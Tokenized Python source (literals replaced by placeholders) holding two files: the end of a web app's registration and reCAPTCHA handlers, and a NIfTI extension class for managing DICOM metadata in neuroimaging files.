session . save ( ) <EOL> def failed_login ( self ) : <EOL> '''<STR_LIT>''' <EOL> logging . info ( "<STR_LIT>" % self . request . remote_ip ) <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ "<STR_LIT>" ] <EOL> ) <EOL> class RegistrationHandler ( BaseHandler ) : <EOL> '''<STR_LIT>''' <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" , errors = None ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> form = Form ( <EOL> username = "<STR_LIT>" , <EOL> pass1 = "<STR_LIT>" , <EOL> pass2 = "<STR_LIT>" , <EOL> ) <EOL> if not form . validate ( self . request . arguments ) : <EOL> self . render ( "<STR_LIT>" , errors = form . errors ) <EOL> elif self . check_recaptcha ( ) : <EOL> username = self . get_argument ( '<STR_LIT:username>' ) <EOL> if User . by_username ( username ) is not None : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> elif not <NUM_LIT:3> <= len ( username ) <= <NUM_LIT:15> : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> elif not self . get_argument ( '<STR_LIT>' ) == self . get_argument ( '<STR_LIT>' ) : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> elif not ( <NUM_LIT:12> <= len ( self . get_argument ( '<STR_LIT>' ) ) <= <NUM_LIT:100> ) : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> else : <EOL> user = self . create_user ( username , self . get_argument ( '<STR_LIT>' ) ) <EOL> self . render ( "<STR_LIT>" , <EOL> username = user . username <EOL> ) <EOL> else : <EOL> self . render ( "<STR_LIT>" , errors = [ '<STR_LIT>' ] ) <EOL> def create_user ( self , username , password ) : <EOL> user = User ( username = unicode ( username ) ) <EOL> self . dbsession . add ( user ) <EOL> self . dbsession . flush ( ) <EOL> user . password = password <EOL> self . dbsession . add ( user ) <EOL> self . dbsession . 
flush ( ) <EOL> return user <EOL> def check_recaptcha ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . config . recaptcha_enable : <EOL> response = None <EOL> try : <EOL> response = captcha . submit ( <EOL> self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . config . recaptcha_private_key , <EOL> self . request . remote_ip <EOL> ) <EOL> except : <EOL> logging . exception ( "<STR_LIT>" ) <EOL> if response is not None and response . is_valid : <EOL> return True <EOL> else : <EOL> return False <EOL> else : <EOL> return True <EOL> class AboutHandler ( BaseHandler ) : <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import json , warnings <EOL> from copy import deepcopy <EOL> import numpy as np <EOL> import nibabel as nb <EOL> from nibabel . nifti1 import Nifti1Extension <EOL> from nibabel . spatialimages import HeaderDataError <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' ) <EOL> from nibabel . nicom . dicomwrappers import wrapper_from_data <EOL> dcm_meta_ecode = <NUM_LIT:0> <EOL> _meta_version = <NUM_LIT> <EOL> _req_base_keys_map = { <NUM_LIT:0.5> : set ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ) , <EOL> <NUM_LIT> : set ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ) , <EOL> } <EOL> '''<STR_LIT>''' <EOL> def is_constant ( sequence , period = None ) : <EOL> '''<STR_LIT>''' <EOL> if period is None : <EOL> return all ( val == sequence [ <NUM_LIT:0> ] for val in sequence ) <EOL> else : <EOL> if period <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> seq_len = len ( sequence ) <EOL> if seq_len % period != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for period_idx in range ( seq_len / period ) : <EOL> start_idx = period_idx * period <EOL> end_idx = start_idx + period <EOL> if not all ( val == sequence [ start_idx ] <EOL> for val in sequence [ start_idx : end_idx ] ) : <EOL> return False <EOL> return True <EOL> def is_repeating ( sequence , period ) : <EOL> '''<STR_LIT>''' <EOL> seq_len = len ( sequence ) <EOL> if period <= <NUM_LIT:1> or period >= seq_len : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if seq_len % period != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for period_idx in range ( <NUM_LIT:1> , seq_len / period 
) : <EOL> start_idx = period_idx * period <EOL> end_idx = start_idx + period <EOL> if sequence [ start_idx : end_idx ] != sequence [ : period ] : <EOL> return False <EOL> return True <EOL> class InvalidExtensionError ( Exception ) : <EOL> def __init__ ( self , msg ) : <EOL> '''<STR_LIT>''' <EOL> self . msg = msg <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . msg <EOL> class DcmMetaExtension ( Nifti1Extension ) : <EOL> '''<STR_LIT>''' <EOL> @ property <EOL> def reorient_transform ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . version < <NUM_LIT> : <EOL> return None <EOL> if self . _content [ '<STR_LIT>' ] is None : <EOL> return None <EOL> return np . array ( self . _content [ '<STR_LIT>' ] ) <EOL> @ reorient_transform . setter <EOL> def reorient_transform ( self , value ) : <EOL> if not value is None and value . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if value is None : <EOL> self . _content [ '<STR_LIT>' ] = None <EOL> else : <EOL> self . _content [ '<STR_LIT>' ] = value . tolist ( ) <EOL> @ property <EOL> def affine ( self ) : <EOL> '''<STR_LIT>''' <EOL> return np . array ( self . _content [ '<STR_LIT>' ] ) <EOL> @ affine . setter <EOL> def affine ( self , value ) : <EOL> if value . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . _content [ '<STR_LIT>' ] = value . tolist ( ) <EOL> @ property <EOL> def slice_dim ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _content [ '<STR_LIT>' ] <EOL> @ slice_dim . setter <EOL> def slice_dim ( self , value ) : <EOL> if not value is None and not ( <NUM_LIT:0> <= value < <NUM_LIT:3> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _content [ '<STR_LIT>' ] = value <EOL> @ property <EOL> def shape ( self ) : <EOL> '''<STR_LIT>''' <EOL> return tuple ( self . _content [ '<STR_LIT>' ] ) <EOL> @ shape . 
setter <EOL> def shape ( self , value ) : <EOL> if not ( <NUM_LIT:3> <= len ( value ) < <NUM_LIT:6> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _content [ '<STR_LIT>' ] [ : ] = value <EOL> @ property <EOL> def version ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _content [ '<STR_LIT>' ] <EOL> @ version . setter <EOL> def version ( self , value ) : <EOL> '''<STR_LIT>''' <EOL> self . _content [ '<STR_LIT>' ] = value <EOL> @ property <EOL> def slice_normal ( self ) : <EOL> '''<STR_LIT>''' <EOL> slice_dim = self . slice_dim <EOL> if slice_dim is None : <EOL> return None <EOL> return np . array ( self . affine [ slice_dim ] [ : <NUM_LIT:3> ] ) <EOL> @ property <EOL> def n_slices ( self ) : <EOL> '''<STR_LIT>''' <EOL> slice_dim = self . slice_dim <EOL> if slice_dim is None : <EOL> return None <EOL> return self . shape [ slice_dim ] <EOL> classifications = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> '''<STR_LIT>''' <EOL> def get_valid_classes ( self ) : <EOL> '''<STR_LIT>''' <EOL> shape = self . shape <EOL> n_dims = len ( shape ) <EOL> if n_dims == <NUM_LIT:3> : <EOL> return self . classifications [ : <NUM_LIT:2> ] <EOL> elif n_dims == <NUM_LIT:4> : <EOL> return self . classifications [ : <NUM_LIT:4> ] <EOL> elif n_dims == <NUM_LIT:5> : <EOL> if shape [ <NUM_LIT:3> ] != <NUM_LIT:1> : <EOL> return self . classifications <EOL> else : <EOL> return self . classifications [ : <NUM_LIT:2> ] + self . classifications [ - <NUM_LIT:2> : ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def get_multiplicity ( self , classification ) : <EOL> '''<STR_LIT>''' <EOL> if not classification in self . get_valid_classes ( ) : <EOL> raise ValueError ( "<STR_LIT>" % classification ) <EOL> base , sub = classification <EOL> shape = self . 
shape <EOL> n_vals = <NUM_LIT:1> <EOL> if sub == '<STR_LIT>' : <EOL> n_vals = self . n_slices <EOL> if n_vals is None : <EOL> return <NUM_LIT:0> <EOL> if base == '<STR_LIT>' : <EOL> n_vals *= shape [ <NUM_LIT:3> ] <EOL> elif base == '<STR_LIT>' : <EOL> for dim_size in shape [ <NUM_LIT:3> : ] : <EOL> n_vals *= dim_size <EOL> elif sub == '<STR_LIT>' : <EOL> if base == '<STR_LIT:time>' : <EOL> n_vals = shape [ <NUM_LIT:3> ] <EOL> if len ( shape ) == <NUM_LIT:5> : <EOL> n_vals *= shape [ <NUM_LIT:4> ] <EOL> elif base == '<STR_LIT>' : <EOL> n_vals = shape [ <NUM_LIT:4> ] <EOL> return n_vals <EOL> def check_valid ( self ) : <EOL> '''<STR_LIT>''' <EOL> if not _req_base_keys_map [ self . version ] <= set ( self . _content ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> if self . affine . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> slice_dim = self . slice_dim <EOL> if slice_dim is not None : <EOL> if not ( <NUM_LIT:0> <= slice_dim < <NUM_LIT:3> ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> if not ( <NUM_LIT:3> <= len ( self . shape ) < <NUM_LIT:6> ) : <EOL> raise InvalidExtensionError ( '<STR_LIT>' ) <EOL> valid_classes = self . get_valid_classes ( ) <EOL> for classes in valid_classes : <EOL> if not classes [ <NUM_LIT:0> ] in self . _content : <EOL> raise InvalidExtensionError ( '<STR_LIT>' <EOL> '<STR_LIT>' % classes [ <NUM_LIT:0> ] ) <EOL> if not classes [ <NUM_LIT:1> ] in self . _content [ classes [ <NUM_LIT:0> ] ] : <EOL> raise InvalidExtensionError ( ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % classes ) <EOL> cls_meta = self . get_class_dict ( classes ) <EOL> cls_mult = self . get_multiplicity ( classes ) <EOL> if cls_mult == <NUM_LIT:0> and len ( cls_meta ) != <NUM_LIT:0> : <EOL> raise InvalidExtensionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> elif cls_mult > <NUM_LIT:1> : <EOL> for key , vals in cls_meta . 
iteritems ( ) : <EOL> n_vals = len ( vals ) <EOL> if n_vals != cls_mult : <EOL> msg = ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % <EOL> ( key , classes , cls_mult , n_vals ) <EOL> ) <EOL> raise InvalidExtensionError ( msg ) <EOL> for classes in valid_classes : <EOL> for other_classes in valid_classes : <EOL> if classes == other_classes : <EOL> continue <EOL> intersect = ( set ( self . get_class_dict ( classes ) ) & <EOL> set ( self . get_class_dict ( other_classes ) ) <EOL> ) <EOL> if len ( intersect ) != <NUM_LIT:0> : <EOL> raise InvalidExtensionError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def get_keys ( self ) : <EOL> '''<STR_LIT>''' <EOL> keys = [ ] <EOL> for base_class , sub_class in self . get_valid_classes ( ) : <EOL> keys += self . _content [ base_class ] [ sub_class ] . keys ( ) <EOL> return keys <EOL> def get_classification ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> for base_class , sub_class in self . get_valid_classes ( ) : <EOL> if key in self . _content [ base_class ] [ sub_class ] : <EOL> return ( base_class , sub_class ) <EOL> return None <EOL> def get_class_dict ( self , classification ) : <EOL> '''<STR_LIT>''' <EOL> base , sub = classification <EOL> return self . _content [ base ] [ sub ] <EOL> def get_values ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> classification = self . get_classification ( key ) <EOL> if classification is None : <EOL> return None <EOL> return self . get_class_dict ( classification ) [ key ] <EOL> def get_values_and_class ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> classification = self . get_classification ( key ) <EOL> if classification is None : <EOL> return ( None , None ) <EOL> return ( self . get_class_dict ( classification ) [ key ] , classification ) <EOL> def filter_meta ( self , filter_func ) : <EOL> '''<STR_LIT>''' <EOL> for classes in self . get_valid_classes ( ) : <EOL> filtered = [ ] <EOL> curr_dict = self . get_class_dict ( classes ) <EOL> for key , values in curr_dict . 
iteritems ( ) : <EOL> if filter_func ( key , values ) : <EOL> filtered . append ( key ) <EOL> for key in filtered : <EOL> del curr_dict [ key ] <EOL> def clear_slice_meta ( self ) : <EOL> '''<STR_LIT>''' <EOL> for base_class , sub_class in self . get_valid_classes ( ) : <EOL> if sub_class == '<STR_LIT>' : <EOL> self . get_class_dict ( ( base_class , sub_class ) ) . clear ( ) <EOL> def get_subset ( self , dim , idx ) : <EOL> '''<STR_LIT>''' <EOL> if not <NUM_LIT:0> <= dim < <NUM_LIT:5> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> shape = self . shape <EOL> valid_classes = self . get_valid_classes ( ) <EOL> result_shape = list ( shape ) <EOL> result_shape [ dim ] = <NUM_LIT:1> <EOL> while result_shape [ - <NUM_LIT:1> ] == <NUM_LIT:1> and len ( result_shape ) > <NUM_LIT:3> : <EOL> result_shape = result_shape [ : - <NUM_LIT:1> ] <EOL> result = self . make_empty ( result_shape , <EOL> self . affine , <EOL> self . reorient_transform , <EOL> self . slice_dim <EOL> ) <EOL> for src_class in valid_classes : <EOL> if src_class == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> for key , val in self . get_class_dict ( src_class ) . iteritems ( ) : <EOL> result . get_class_dict ( src_class ) [ key ] = deepcopy ( val ) <EOL> continue <EOL> if dim == self . slice_dim : <EOL> if src_class [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> for key , vals in self . get_class_dict ( src_class ) . iteritems ( ) : <EOL> result . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> else : <EOL> result . _copy_slice ( self , src_class , idx ) <EOL> elif dim < <NUM_LIT:3> : <EOL> for key , vals in self . get_class_dict ( src_class ) . iteritems ( ) : <EOL> result . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> elif dim == <NUM_LIT:3> : <EOL> result . _copy_sample ( self , src_class , '<STR_LIT:time>' , idx ) <EOL> else : <EOL> result . _copy_sample ( self , src_class , '<STR_LIT>' , idx ) <EOL> return result <EOL> def to_json ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . 
check_valid ( ) <EOL> return self . _mangle ( self . _content ) <EOL> @ classmethod <EOL> def from_json ( klass , json_str ) : <EOL> '''<STR_LIT>''' <EOL> result = klass ( dcm_meta_ecode , json_str ) <EOL> result . check_valid ( ) <EOL> return result <EOL> @ classmethod <EOL> def make_empty ( klass , shape , affine , reorient_transform = None , <EOL> slice_dim = None ) : <EOL> '''<STR_LIT>''' <EOL> result = klass ( dcm_meta_ecode , '<STR_LIT:{}>' ) <EOL> result . _content [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> if len ( shape ) > <NUM_LIT:3> and shape [ <NUM_LIT:3> ] != <NUM_LIT:1> : <EOL> result . _content [ '<STR_LIT:time>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT:time>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT:time>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> if len ( shape ) > <NUM_LIT:4> : <EOL> result . _content [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> result . _content [ '<STR_LIT>' ] = [ ] <EOL> result . shape = shape <EOL> result . affine = affine <EOL> result . reorient_transform = reorient_transform <EOL> result . slice_dim = slice_dim <EOL> result . version = _meta_version <EOL> return result <EOL> @ classmethod <EOL> def from_runtime_repr ( klass , runtime_repr ) : <EOL> '''<STR_LIT>''' <EOL> result = klass ( dcm_meta_ecode , '<STR_LIT:{}>' ) <EOL> result . _content = runtime_repr <EOL> result . 
check_valid ( ) <EOL> return result <EOL> @ classmethod <EOL> def from_sequence ( klass , seq , dim , affine = None , slice_dim = None ) : <EOL> '''<STR_LIT>''' <EOL> if not <NUM_LIT:0> <= dim < <NUM_LIT:5> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> n_inputs = len ( seq ) <EOL> first_input = seq [ <NUM_LIT:0> ] <EOL> input_shape = first_input . shape <EOL> if len ( input_shape ) > dim and input_shape [ dim ] != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> output_shape = list ( input_shape ) <EOL> while len ( output_shape ) <= dim : <EOL> output_shape . append ( <NUM_LIT:1> ) <EOL> output_shape [ dim ] = n_inputs <EOL> if affine is None : <EOL> affine = first_input . affine <EOL> if slice_dim is None : <EOL> slice_dim = first_input . slice_dim <EOL> result = klass . make_empty ( output_shape , <EOL> affine , <EOL> None , <EOL> slice_dim ) <EOL> result_slc_norm = result . slice_normal <EOL> first_slc_norm = first_input . slice_normal <EOL> use_slices = ( not result_slc_norm is None and <EOL> not first_slc_norm is None and <EOL> np . allclose ( result_slc_norm , first_slc_norm ) ) <EOL> for classes in first_input . get_valid_classes ( ) : <EOL> if classes [ <NUM_LIT:1> ] == '<STR_LIT>' and not use_slices : <EOL> continue <EOL> result . _content [ classes [ <NUM_LIT:0> ] ] [ classes [ <NUM_LIT:1> ] ] = deepcopy ( first_input . get_class_dict ( classes ) ) <EOL> shape = list ( result . shape ) <EOL> shape [ dim ] = <NUM_LIT:1> <EOL> result . shape = shape <EOL> reorient_transform = first_input . reorient_transform <EOL> for input_ext in seq [ <NUM_LIT:1> : ] : <EOL> if ( ( reorient_transform is None or <EOL> input_ext . reorient_transform is None ) or <EOL> not ( np . allclose ( input_ext . affine , affine ) or <EOL> np . allclose ( input_ext . reorient_transform , <EOL> reorient_transform ) <EOL> ) <EOL> ) : <EOL> reorient_transform = None <EOL> result . _insert ( dim , input_ext ) <EOL> shape [ dim ] += <NUM_LIT:1> <EOL> result . 
shape = shape <EOL> result . reorient_transform = reorient_transform <EOL> for key in result . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) . keys ( ) : <EOL> result . _simplify ( key ) <EOL> return result <EOL> def __str__ ( self ) : <EOL> return self . _mangle ( self . _content ) <EOL> def __eq__ ( self , other ) : <EOL> if not np . allclose ( self . affine , other . affine ) : <EOL> return False <EOL> if self . shape != other . shape : <EOL> return False <EOL> if self . slice_dim != other . slice_dim : <EOL> return False <EOL> if self . version != other . version : <EOL> return False <EOL> for classes in self . get_valid_classes ( ) : <EOL> if ( dict ( self . get_class_dict ( classes ) ) != <EOL> dict ( other . get_class_dict ( classes ) ) ) : <EOL> return False <EOL> return True <EOL> def _unmangle ( self , value ) : <EOL> '''<STR_LIT>''' <EOL> kwargs = { } <EOL> if sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> kwargs [ '<STR_LIT>' ] = OrderedDict <EOL> return json . loads ( value , ** kwargs ) <EOL> def _mangle ( self , value ) : <EOL> '''<STR_LIT>''' <EOL> return json . dumps ( value , indent = <NUM_LIT:4> ) <EOL> _const_tests = { ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> } <EOL> '''<STR_LIT>''' <EOL> def _get_const_period ( self , src_cls , dest_cls ) : <EOL> '''<STR_LIT>''' <EOL> if dest_cls == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return None <EOL> elif src_cls == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return self . 
get_multiplicity ( src_cls ) / self . get_multiplicity ( dest_cls ) <EOL> elif src_cls == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return self . n_slices <EOL> elif src_cls == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return self . shape [ <NUM_LIT:3> ] <EOL> assert False <EOL> _repeat_tests = { ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , ) , <EOL> } <EOL> '''<STR_LIT>''' <EOL> def _simplify ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> values , curr_class = self . get_values_and_class ( key ) <EOL> if curr_class == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if values is None : <EOL> del self . get_class_dict ( curr_class ) [ key ] <EOL> return True <EOL> return False <EOL> dests = self . _const_tests [ curr_class ] <EOL> for dest_cls in dests : <EOL> if dest_cls [ <NUM_LIT:0> ] in self . _content : <EOL> period = self . _get_const_period ( curr_class , dest_cls ) <EOL> if period == <NUM_LIT:1> or is_constant ( values , period ) : <EOL> if period is None : <EOL> self . get_class_dict ( dest_cls ) [ key ] = values [ <NUM_LIT:0> ] <EOL> else : <EOL> self . get_class_dict ( dest_cls ) [ key ] = values [ : : period ] <EOL> break <EOL> else : <EOL> if curr_class in self . _repeat_tests : <EOL> for dest_cls in self . _repeat_tests [ curr_class ] : <EOL> if dest_cls [ <NUM_LIT:0> ] in self . _content : <EOL> dest_mult = self . get_multiplicity ( dest_cls ) <EOL> if is_repeating ( values , dest_mult ) : <EOL> self . get_class_dict ( dest_cls ) [ key ] = values [ : dest_mult ] <EOL> break <EOL> else : <EOL> return False <EOL> else : <EOL> return False <EOL> del self . 
get_class_dict ( curr_class ) [ key ] <EOL> return True <EOL> _preserving_changes = { None : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT:time>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : tuple ( ) , <EOL> } <EOL> '''<STR_LIT>''' <EOL> def _get_changed_class ( self , key , new_class , slice_dim = None ) : <EOL> '''<STR_LIT>''' <EOL> values , curr_class = self . get_values_and_class ( key ) <EOL> if curr_class == new_class : <EOL> return values <EOL> if not new_class in self . _preserving_changes [ curr_class ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if curr_class is None : <EOL> curr_mult = <NUM_LIT:1> <EOL> per_slice = False <EOL> else : <EOL> curr_mult = self . get_multiplicity ( curr_class ) <EOL> per_slice = curr_class [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> if new_class in self . get_valid_classes ( ) : <EOL> new_mult = self . get_multiplicity ( new_class ) <EOL> if new_mult == <NUM_LIT:0> : <EOL> new_mult = self . 
shape [ slice_dim ] <EOL> else : <EOL> new_mult = <NUM_LIT:1> <EOL> mult_fact = new_mult / curr_mult <EOL> if curr_mult == <NUM_LIT:1> : <EOL> values = [ values ] <EOL> if per_slice : <EOL> result = values * mult_fact <EOL> else : <EOL> result = [ ] <EOL> for value in values : <EOL> result . extend ( [ deepcopy ( value ) ] * mult_fact ) <EOL> if new_class == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> result = result [ <NUM_LIT:0> ] <EOL> return result <EOL> def _change_class ( self , key , new_class ) : <EOL> '''<STR_LIT>''' <EOL> values , curr_class = self . get_values_and_class ( key ) <EOL> if curr_class == new_class : <EOL> return <EOL> self . get_class_dict ( new_class ) [ key ] = self . _get_changed_class ( key , <EOL> new_class ) <EOL> if not curr_class is None : <EOL> del self . get_class_dict ( curr_class ) [ key ] <EOL> def _copy_slice ( self , other , src_class , idx ) : <EOL> '''<STR_LIT>''' <EOL> if src_class [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> for classes in ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if classes in self . get_valid_classes ( ) : <EOL> dest_class = classes <EOL> break <EOL> elif src_class [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> for classes in ( ( '<STR_LIT:time>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if classes in self . get_valid_classes ( ) : <EOL> dest_class = classes <EOL> break <EOL> else : <EOL> dest_class = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> src_dict = other . get_class_dict ( src_class ) <EOL> dest_dict = self . get_class_dict ( dest_class ) <EOL> dest_mult = self . get_multiplicity ( dest_class ) <EOL> stride = other . n_slices <EOL> for key , vals in src_dict . 
iteritems ( ) : <EOL> subset_vals = vals [ idx : : stride ] <EOL> if len ( subset_vals ) < dest_mult : <EOL> full_vals = [ ] <EOL> for val_idx in xrange ( dest_mult / len ( subset_vals ) ) : <EOL> full_vals += deepcopy ( subset_vals ) <EOL> subset_vals = full_vals <EOL> if len ( subset_vals ) == <NUM_LIT:1> : <EOL> subset_vals = subset_vals [ <NUM_LIT:0> ] <EOL> dest_dict [ key ] = deepcopy ( subset_vals ) <EOL> self . _simplify ( key ) <EOL> def _global_slice_subset ( self , key , sample_base , idx ) : <EOL> '''<STR_LIT>''' <EOL> n_slices = self . n_slices <EOL> shape = self . shape <EOL> src_dict = self . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if sample_base == '<STR_LIT>' : <EOL> slices_per_vec = n_slices * shape [ <NUM_LIT:3> ] <EOL> start_idx = idx * slices_per_vec <EOL> end_idx = start_idx + slices_per_vec <EOL> return src_dict [ key ] [ start_idx : end_idx ] <EOL> else : <EOL> if not ( '<STR_LIT>' , '<STR_LIT>' ) in self . get_valid_classes ( ) : <EOL> start_idx = idx * n_slices <EOL> end_idx = start_idx + n_slices <EOL> return src_dict [ key ] [ start_idx : end_idx ] <EOL> else : <EOL> result = [ ] <EOL> slices_per_vec = n_slices * shape [ <NUM_LIT:3> ] <EOL> for vec_idx in xrange ( shape [ <NUM_LIT:4> ] ) : <EOL> start_idx = ( vec_idx * slices_per_vec ) + ( idx * n_slices ) 